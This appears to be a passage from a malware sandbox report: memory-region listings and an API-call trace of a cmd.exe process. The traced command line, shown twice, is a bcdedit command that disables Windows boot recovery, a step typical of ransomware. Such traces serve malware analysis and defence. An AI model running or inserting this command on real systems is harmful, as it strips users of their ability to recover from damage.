= "" Region: id = 918 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 919 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 920 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 921 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 922 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 923 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 924 start_va = 0x5e0000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 925 start_va = 0x74bd0000 end_va = 0x74bd7fff entry_point = 0x74bd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 926 start_va = 0x74be0000 end_va = 0x74c3bfff entry_point = 0x74c1f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 927 start_va = 0x74c40000 end_va = 0x74c7efff entry_point = 0x74c6de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 928 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x0 region_type = private name = "private_0x00000000772a0000" filename = "" Region: id = 929 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 1134 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1135 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1136 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1137 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1138 start_va = 0x800000 end_va = 0x8fffff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 1139 start_va = 0x73fa0000 end_va = 0x73fa6fff entry_point = 0x73fa1230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 1140 start_va = 0x751f0000 end_va = 0x751fbfff entry_point = 0x751f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1141 start_va = 0x75200000 end_va = 0x7525ffff entry_point = 0x7521a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1142 start_va = 0x75660000 end_va = 0x7574ffff entry_point = 0x75670569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1143 start_va = 0x76430000 end_va = 0x7652ffff entry_point = 0x7644b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1144 start_va = 0x76a20000 end_va = 0x76b2ffff entry_point = 0x76a332d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1145 start_va = 0x76c90000 end_va = 0x76cd5fff entry_point = 0x76c97478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1146 start_va = 0x76ce0000 end_va = 0x76d8bfff entry_point = 0x76cea472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1147 start_va = 0x76e20000 end_va = 0x76eaffff entry_point = 0x76e36343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1148 start_va = 0x76f00000 end_va = 0x76f9cfff entry_point = 0x76f33fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1149 start_va = 0x76fa0000 end_va = 0x76fb8fff entry_point = 0x76fa4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1150 start_va = 0x77200000 end_va = 0x7729ffff entry_point = 0x772149e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1151 start_va = 0x77670000 end_va = 0x77679fff entry_point = 0x776736a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1152 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1153 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1164 start_va = 0x660000 end_va = 0x7e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 1165 start_va = 0x767d0000 end_va = 0x7689bfff entry_point = 0x767d168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1166 start_va = 0x768a0000 end_va = 0x768fffff entry_point = 0x768b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1167 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1168 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1169 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1170 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1171 start_va = 0x900000 end_va = 0xa80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 1172 start_va = 0xa90000 end_va = 0x1e8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 1173 start_va = 0x1e90000 end_va = 0x21d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Thread: id = 37 os_tid = 0xb18 [0022.042] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x43fe54 | out: lpSystemTimeAsFileTime=0x43fe54*(dwLowDateTime=0x14bef5c0, dwHighDateTime=0x1d35d7b)) [0022.042] GetCurrentProcessId () returned 0xb14 [0022.042] GetCurrentThreadId () returned 0xb18 [0022.042] GetTickCount () returned 0x14a19 [0022.042] QueryPerformanceCounter (in: lpPerformanceCount=0x43fe4c | out: lpPerformanceCount=0x43fe4c*=327000886) returned 1 [0022.044] GetModuleHandleA (lpModuleName=0x0) returned 0x4a510000 [0022.044] __set_app_type (_Type=0x1) [0022.044] __p__fmode () returned 0x76d831f4 [0022.044] __p__commode () returned 0x76d831fc [0022.044] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5321a6) returned 0x0 [0022.044] __getmainargs (in: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c, _DoWildCard=0, _StartInfo=0x4a534140 | out: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c) returned 0 [0022.044] GetCurrentThreadId () returned 0xb18 [0022.044] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb18) returned 0x60 [0022.044] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0022.045] GetProcAddress (hModule=0x76a20000, lpProcName="SetThreadUILanguage") returned 0x76a4a84f [0022.045] SetThreadUILanguage (LangId=0x0) returned 0x409 [0022.045] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0022.046] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x43fde4 | out: phkResult=0x43fde4*=0x0) returned 0x2 [0022.046] VirtualQuery (in: lpAddress=0x43fe1b, lpBuffer=0x43fdb4, dwLength=0x1c | out: lpBuffer=0x43fdb4*(BaseAddress=0x43f000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0022.046] VirtualQuery (in: lpAddress=0x340000, lpBuffer=0x43fdb4, dwLength=0x1c | out: lpBuffer=0x43fdb4*(BaseAddress=0x340000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0022.046] VirtualQuery (in: lpAddress=0x341000, lpBuffer=0x43fdb4, dwLength=0x1c | out: lpBuffer=0x43fdb4*(BaseAddress=0x341000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0022.046] VirtualQuery (in: lpAddress=0x343000, lpBuffer=0x43fdb4, dwLength=0x1c | out: lpBuffer=0x43fdb4*(BaseAddress=0x343000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0022.046] VirtualQuery (in: lpAddress=0x440000, lpBuffer=0x43fdb4, dwLength=0x1c | out: lpBuffer=0x43fdb4*(BaseAddress=0x440000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x130000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0022.046] GetConsoleOutputCP () returned 0x1b5 [0022.046] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0022.046] SetConsoleCtrlHandler (HandlerRoutine=0x4a52e72a, Add=1) returned 1 [0022.046] _get_osfhandle (_FileHandle=1) returned 0x7 [0022.046] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0022.047] _get_osfhandle (_FileHandle=1) returned 0x7 [0022.047] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0022.048] _get_osfhandle (_FileHandle=1) returned 0x7 [0022.048] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0022.048] _get_osfhandle (_FileHandle=0) returned 0x3 [0022.048] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0022.049] _get_osfhandle (_FileHandle=0) returned 0x3 [0022.049] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0022.054] GetEnvironmentStringsW () returned 0x812070* [0022.054] FreeEnvironmentStringsW (penv=0x812070) returned 1 [0022.054] GetEnvironmentStringsW () returned 0x812070* [0022.055] FreeEnvironmentStringsW (penv=0x812070) returned 1 [0022.055] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x43ed54 | out: phkResult=0x43ed54*=0x68) returned 0x0 [0022.055] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x43ed5c, lpData=0x43ed60, lpcbData=0x43ed58*=0x1000 | out: lpType=0x43ed5c*=0x0, lpData=0x43ed60*=0x0, lpcbData=0x43ed58*=0x1000) returned 0x2 [0022.055] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x43ed5c, lpData=0x43ed60, lpcbData=0x43ed58*=0x1000 | out: lpType=0x43ed5c*=0x4, lpData=0x43ed60*=0x1, lpcbData=0x43ed58*=0x4) returned 0x0 [0022.055] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x43ed5c, lpData=0x43ed60, lpcbData=0x43ed58*=0x1000 | out: lpType=0x43ed5c*=0x0, lpData=0x43ed60*=0x1, lpcbData=0x43ed58*=0x1000) returned 0x2 [0022.055] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x43ed5c, lpData=0x43ed60, lpcbData=0x43ed58*=0x1000 | out: lpType=0x43ed5c*=0x4, lpData=0x43ed60*=0x0, lpcbData=0x43ed58*=0x4) returned 0x0 [0022.055] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x43ed5c, lpData=0x43ed60, lpcbData=0x43ed58*=0x1000 | out: lpType=0x43ed5c*=0x4, lpData=0x43ed60*=0x40, lpcbData=0x43ed58*=0x4) returned 0x0 [0022.055] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x43ed5c, lpData=0x43ed60, lpcbData=0x43ed58*=0x1000 | out: lpType=0x43ed5c*=0x4, lpData=0x43ed60*=0x40, lpcbData=0x43ed58*=0x4) returned 0x0 [0022.055] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x43ed5c, lpData=0x43ed60, lpcbData=0x43ed58*=0x1000 | out: lpType=0x43ed5c*=0x0, lpData=0x43ed60*=0x40, lpcbData=0x43ed58*=0x1000) returned 0x2 [0022.055] RegCloseKey (hKey=0x68) returned 0x0 [0022.055] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x43ed54 | out: phkResult=0x43ed54*=0x68) returned 0x0 [0022.055] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x43ed5c, lpData=0x43ed60, lpcbData=0x43ed58*=0x1000 | out: lpType=0x43ed5c*=0x0, lpData=0x43ed60*=0x40, lpcbData=0x43ed58*=0x1000) returned 0x2 [0022.055] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x43ed5c, lpData=0x43ed60, lpcbData=0x43ed58*=0x1000 | out: lpType=0x43ed5c*=0x4, lpData=0x43ed60*=0x1, lpcbData=0x43ed58*=0x4) returned 0x0 [0022.055] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x43ed5c, lpData=0x43ed60, lpcbData=0x43ed58*=0x1000 | out: lpType=0x43ed5c*=0x0, lpData=0x43ed60*=0x1, lpcbData=0x43ed58*=0x1000) returned 0x2 [0022.061] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x43ed5c, lpData=0x43ed60, lpcbData=0x43ed58*=0x1000 | out: lpType=0x43ed5c*=0x4, lpData=0x43ed60*=0x0, lpcbData=0x43ed58*=0x4) returned 0x0 [0022.061] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x43ed5c, lpData=0x43ed60, lpcbData=0x43ed58*=0x1000 | out: lpType=0x43ed5c*=0x4, lpData=0x43ed60*=0x9, lpcbData=0x43ed58*=0x4) returned 0x0 [0022.061] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x43ed5c, lpData=0x43ed60, lpcbData=0x43ed58*=0x1000 | out: lpType=0x43ed5c*=0x4, lpData=0x43ed60*=0x9, lpcbData=0x43ed58*=0x4) returned 0x0 [0022.061] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x43ed5c, lpData=0x43ed60, lpcbData=0x43ed58*=0x1000 | out: lpType=0x43ed5c*=0x0, lpData=0x43ed60*=0x9, lpcbData=0x43ed58*=0x1000) returned 0x2 [0022.061] RegCloseKey (hKey=0x68) returned 0x0 [0022.061] time (in: timer=0x0 | out: timer=0x0) returned 0x5a0b3db5 [0022.061] srand (_Seed=0x5a0b3db5) [0022.061] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C bcdedit /set {default} recoveryenabled No" [0022.061] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C bcdedit /set {default} recoveryenabled No" [0022.061] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0022.061] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x812078, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0022.062] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0022.062] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0022.062] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0022.062] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0022.062] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0022.062] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0022.062] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0022.062] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0022.062] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0022.062] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0022.062] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0022.062] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0022.062] GetEnvironmentStringsW () returned 0x812288* [0022.062] FreeEnvironmentStringsW (penv=0x812288) returned 1 [0022.062] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0022.062] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0022.062] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0022.062] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0022.062] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0022.062] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0022.062] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0022.062] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0022.062] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0022.062] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0022.062] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x43fb20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0022.062] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x43fb20, lpFilePart=0x43fb1c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x43fb1c*="Desktop") returned 0x25 [0022.063] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0022.063] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x43f89c | out: lpFindFileData=0x43f89c) returned 0x811ef0 [0022.063] FindClose (in: hFindFile=0x811ef0 | out: hFindFile=0x811ef0) returned 1 [0022.063] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x43f89c | out: lpFindFileData=0x43f89c) returned 0x811ef0 [0022.063] FindClose (in: hFindFile=0x811ef0 | out: hFindFile=0x811ef0) returned 1 [0022.063] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0022.063] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x43f89c | out: lpFindFileData=0x43f89c) returned 0x811ef0 [0022.063] FindClose (in: hFindFile=0x811ef0 | out: hFindFile=0x811ef0) returned 1 [0022.063] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0022.063] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0022.063] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0022.064] GetEnvironmentStringsW () returned 0x8140f8* [0022.064] FreeEnvironmentStringsW (penv=0x8140f8) returned 1 [0022.064] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0022.064] GetConsoleOutputCP () returned 0x1b5 [0022.064] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0022.064] GetUserDefaultLCID () returned 0x409 [0022.065] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a534950, cchData=8 | out: lpLCData=":") returned 2 [0022.065] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x43fc60, cchData=128 | out: lpLCData="0") returned 2 [0022.065] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x43fc60, cchData=128 | out: lpLCData="0") returned 2 [0022.065] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x43fc60, cchData=128 | out: lpLCData="1") returned 2 [0022.065] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a534940, cchData=8 | out: lpLCData="/") returned 2 [0022.065] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a534d80, cchData=32 | out: lpLCData="Mon") returned 4 [0022.065] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a534d40, cchData=32 | out: lpLCData="Tue") returned 4 [0022.065] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a534d00, cchData=32 | out: lpLCData="Wed") returned 4 [0022.065] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a534cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0022.065] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a534c80, cchData=32 | out: lpLCData="Fri") returned 4 [0022.065] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a534c40, cchData=32 | out: lpLCData="Sat") returned 4 [0022.065] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a534c00, cchData=32 | out: lpLCData="Sun") returned 4 [0022.065] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a534930, cchData=8 | out: lpLCData=".") returned 2 [0022.065] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a534920, cchData=8 | out: lpLCData=",") returned 2 [0022.065] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0022.066] GetConsoleTitleW (in: lpConsoleTitle=0x812e30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0022.067] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0022.067] GetProcAddress (hModule=0x76a20000, lpProcName="CopyFileExW") returned 0x76a53b92 [0022.067] GetProcAddress (hModule=0x76a20000, lpProcName="IsDebuggerPresent") returned 0x76a34a5d [0022.067] GetProcAddress (hModule=0x76a20000, lpProcName="SetConsoleInputExeNameW") returned 0x76a4a79d [0022.067] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0022.067] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0022.068] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0022.068] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0022.068] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0022.068] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0022.068] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0022.069] GetConsoleTitleW (in: lpConsoleTitle=0x43f958, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0022.069] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0022.069] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0022.069] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0022.069] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0022.069] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0022.069] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0022.069] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0022.069] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0022.069] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0022.069] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0022.069] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0022.069] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0022.070] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0022.070] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0022.070] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0022.070] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0022.070] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0022.070] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0022.070] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0022.070] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0022.070] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0022.070] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0022.070] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0022.070] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0022.070] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0022.070] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0022.070] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0022.070] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0022.070] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0022.070] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0022.070] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0022.070] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0022.070] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0022.070] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0022.070] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0022.070] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0022.070] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0022.070] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0022.070] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0022.070] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0022.070] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0022.070] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0022.071] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 